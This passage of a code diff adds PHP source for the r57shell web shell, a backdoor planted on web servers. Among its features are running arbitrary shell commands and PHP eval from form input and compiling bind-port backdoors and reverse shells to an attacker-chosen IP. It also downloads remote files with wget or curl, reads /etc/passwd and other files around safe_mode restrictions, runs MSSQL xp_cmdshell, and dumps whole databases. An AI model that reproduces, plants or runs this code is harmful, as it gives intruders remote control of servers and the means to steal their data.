+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/back.c",$back_connect_c);
+ $blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ @unlink("/tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/dp",$datapipe_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf("/tmp/dpc.c",$datapipe_c);
+ $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
+ @unlink("/tmp/dpc.c");
+ $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}
+if (!empty($HTTP_POST_FILES['userfile']['name']))
+{
+if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
+else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
+@copy($HTTP_POST_FILES['userfile']['tmp_name'],
+            $_POST['dir']."/".$nfn)
+      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
+}
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case wget:
+ $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
+ break;
+ case fetch:
+ $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ case lynx:
+ $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case links:
+ $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case GET:
+ $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
+ break;
+ case curl:
+ $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
+ break;
+ }
+}
+echo $table_up3;
+if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+if($safe_mode)
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+  $d=@dir($dir);
+  if ($d)
+   {
+   while (false!==($file=$d->read()))
+    {
+     if ($file=="." || $file=="..") continue;
+     @clearstatcache();
+     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
+     if($windows){
+     echo date("d.m.Y H:i",$mtime);
+     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
+     }
+     else{
+     $owner = @posix_getpwuid($uid);
+     $grgid = @posix_getgrgid($gid);
+     echo $inode." ";
+     echo perms(@fileperms($file));
+     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
+     echo date("d.m.Y H:i ",$mtime);
+     }
+     echo "$file\n";
+    }
+   $d->close();
+   }
+  else echo $lang[$language._text29];
+ break;
+ case 'safe_file':
+  if(@is_file($_POST['file']))
+   {
+   $file = @file($_POST['file']);
+   if($file)
+    {
+    $c = @sizeof($file);
+    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
+    }
+   else echo $lang[$language._text29];
+   }
+  else echo $lang[$language._text31];
+  break;
+  case 'test1':
+  $ci = @curl_init("file://".$_POST['test1_file']."");
+  $cf = @curl_exec($ci);
+  echo $cf;
+  break;
+  case 'test2':
+  @include($_POST['test2_file']);
+  break;
+  case 'test3':
+  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
+  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['test3_md'],$db))
+    {
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";
+     @mysql_query($sql);
+     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";
+     @mysql_query($sql);
+     $sql = "SELECT * FROM temp_r57_table;";
+     $r = @mysql_query($sql);
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     $sql = "DROP TABLE IF EXISTS temp_r57_table;";
+     @mysql_query($sql);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table r57_temp_table",$db);
+     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from r57_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table r57_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){
+ $cmd_rep = ex($_POST['cmd']);
+ if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="db_show")
+ {
+ switch($_POST['db'])
+ {
+ case 'MySQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+ $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mysql_query("SHOW DATABASES", $db);
+   while(($row=@mysql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);
+     while(($row2=@mysql_fetch_row($res2)))
+      {
+      echo " | - ".$row2[0]."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);
+       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }
+       }
+      }
+     }
+    }
+   @mysql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MySQL server";
+ break;
+ case 'MSSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+ $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+ if($db)
+   {
+   $res=@mssql_query("sp_databases", $db);
+   while(($row=@mssql_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+     if(isset($_POST['st'])){
+     @mssql_select_db($row[0]);
+     $res2 = @mssql_query("sp_tables",$db);
+     while(($row2=@mssql_fetch_array($res2)))
+      {
+      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')
+      {
+      echo " | - ".$row2['TABLE_NAME']."\r\n";
+      if(isset($_POST['sc']))
+       {
+       $res3 = @mssql_query("sp_columns ".$row2[2],$db);
+       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }
+       }
+      }
+      }
+     }
+    }
+   @mssql_close($db);
+   }
+ else echo "[-] ERROR! Can't connect to MSSQL server";
+ break;
+ case 'PostgreSQL':
+ if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");
+   while(($row=@pg_fetch_row($res)))
+    {
+     echo "[+] ".$row[0]."\r\n";
+    }
+  @pg_close($db);
+  }
+ else echo "[-] ERROR! Can't connect to PostgreSQL server";
+ break;
+ }
+ }
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $sqh  = "# homepage: http://\r\n";
+  $sqh .= "# ---------------------------------\r\n";
+  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";
+  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";
+  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+  $sqh .= "# ---------------------------------\r\n\r\n";
+  switch($_POST['db']){
+  case 'MySQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }
+  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MySQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+     $sql2 = '';
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while (($row = @mysql_fetch_assoc($res))) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MySQL server";
+  break;
+  case 'MSSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }
+  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+  {
+   if(@mssql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1  = "# MSSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);
+     if (@mssql_num_rows($res) > 0) {
+     while (($row = @mssql_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+    }
+   else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'PostgreSQL':
+  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }
+  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";
+  $db = @pg_connect($str);
+  if($db)
+  {
+     $sql1  = "# PostgreSQL dump created by r57shell\r\n";
+     $sql1 .= $sqh;
+     $sql2 = '';
+     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");
+     if (@pg_num_rows($res) > 0) {
+     while (($row = @pg_fetch_assoc($res))) {
+     $keys = @implode(", ", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+     else { echo $sql1.$sql2; }
+   @pg_close($db);
+  }
+  else echo "[-] ERROR! Can't connect to PostgreSQL server";
+  break;
+  }
+ }
+ else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+if(!$safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
